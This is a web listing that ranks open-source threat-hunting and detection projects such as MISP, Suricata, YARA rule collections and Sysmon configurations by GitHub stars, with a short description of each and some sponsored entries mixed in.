threat-hunting

Top 23 threat-hunting Open-Source Projects

threat-hunting
  1. MISP

    MISP (core software) - Open Source Threat Intelligence and Sharing Platform

    Project mention: TryHackMe: MISP | dev.to | 2025-04-25

    MISP (Malware Information Sharing Platform) is an open-source threat information platform that facilitates the collection, storage and distribution of threat intelligence and Indicators of Compromise (IOCs) related to malware, cyber attacks, financial fraud or any intelligence within a community of trusted members.

  2. InfluxDB

    InfluxDB – Built for High-Performance Time Series Workloads. InfluxDB 3 OSS is now GA. Transform, enrich, and act on time series data directly in the database. Automate critical tasks and eliminate the need to move data externally. Download now.

    InfluxDB logo
  3. Suricata

    Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.

    Project mention: What is a Denial of Service (DoS) Attack? A Comprehensive Guide | dev.to | 2025-04-28

    Suricata - High-performance Network IDS, IPS, and Network Security Monitoring engine.

  4. dnstwist

    Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation

  5. sysmon-config

    Sysmon configuration file template with default high-quality event tracing

  6. ThreatHunter-Playbook

    A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

  7. awesome-threat-detection

    ✨ A curated list of awesome threat detection and hunting resources 🕵️‍♂️

  8. IntelOwl

    IntelOwl: manage your Threat Intelligence at scale

  9. SaaSHub

    SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives

    SaaSHub logo
  10. HELK

    The Hunting ELK

  11. awesome-yara

    A curated list of awesome YARA rules, tools, and people.

  12. securityonion

    Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, detections, and case management. It also includes other tools such as osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.

  13. malwoverview

    Malwoverview is a first response tool used for threat hunting and offers intel information from Virus Total, Hybrid Analysis, URLHaus, Polyswarm, Malshare, Alien Vault, Malpedia, Malware Bazaar, ThreatFox, Triage, InQuest, VxExchange and IPInfo, and it is also able to scan Android devices against VT.

  14. chainsaw

    Rapidly Search and Hunt through Windows Forensic Artefacts

  15. sysmon-modular

    A repository of sysmon configuration modules

  16. signature-base

    YARA signature and IOC database for my scanners and tools

  17. hayabusa

    Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.

  18. APT_REPORT

    Interesting APT Report Collection And Some Special IOC

  19. EVTX-ATTACK-SAMPLES

    Windows Events Attack Samples

  20. detection-rules

    Rules for Elastic Security's detection engine

    Project mention: Initial details about why the CrowdStrike's CSAgent.sys crashed | news.ycombinator.com | 2024-07-20

    [2] https://github.com/elastic/detection-rules

  21. yeti

    Your Everyday Threat Intelligence

  22. matano

    Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS

    Project mention: Matano: Open-source security data lake for cybersecurity analytics | news.ycombinator.com | 2025-04-03
  23. SysmonTools

    Utilities for Sysmon

  24. Hunting-Queries-Detection-Rules

    KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.

  25. APT-Hunter

    APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity

  26. SaaSHub

    SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives

    SaaSHub logo
NOTE: The open source projects on this list are ordered by number of github stars. The number of mentions indicates repo mentiontions in the last 12 Months or since we started tracking (Dec 2020).

threat-hunting discussion

Log in or Post with

threat-hunting related posts

Index

What are some of the best open-source threat-hunting projects? This list will help you:

# Project Stars
1 MISP 5,697
2 Suricata 5,241
3 dnstwist 5,148
4 sysmon-config 5,004
5 ThreatHunter-Playbook 4,207
6 awesome-threat-detection 4,159
7 IntelOwl 4,120
8 HELK 3,830
9 awesome-yara 3,807
10 securityonion 3,700
11 malwoverview 3,193
12 chainsaw 3,147
13 sysmon-modular 2,775
14 signature-base 2,621
15 hayabusa 2,607
16 APT_REPORT 2,555
17 EVTX-ATTACK-SAMPLES 2,340
18 detection-rules 2,288
19 yeti 1,849
20 matano 1,556
21 SysmonTools 1,520
22 Hunting-Queries-Detection-Rules 1,454
23 APT-Hunter 1,336

Sponsored
InfluxDB – Built for High-Performance Time Series Workloads
InfluxDB 3 OSS is now GA. Transform, enrich, and act on time series data directly in the database. Automate critical tasks and eliminate the need to move data externally. Download now.
www.influxdata.com

Did you know that Python is
the 2nd most popular programming language
based on number of references?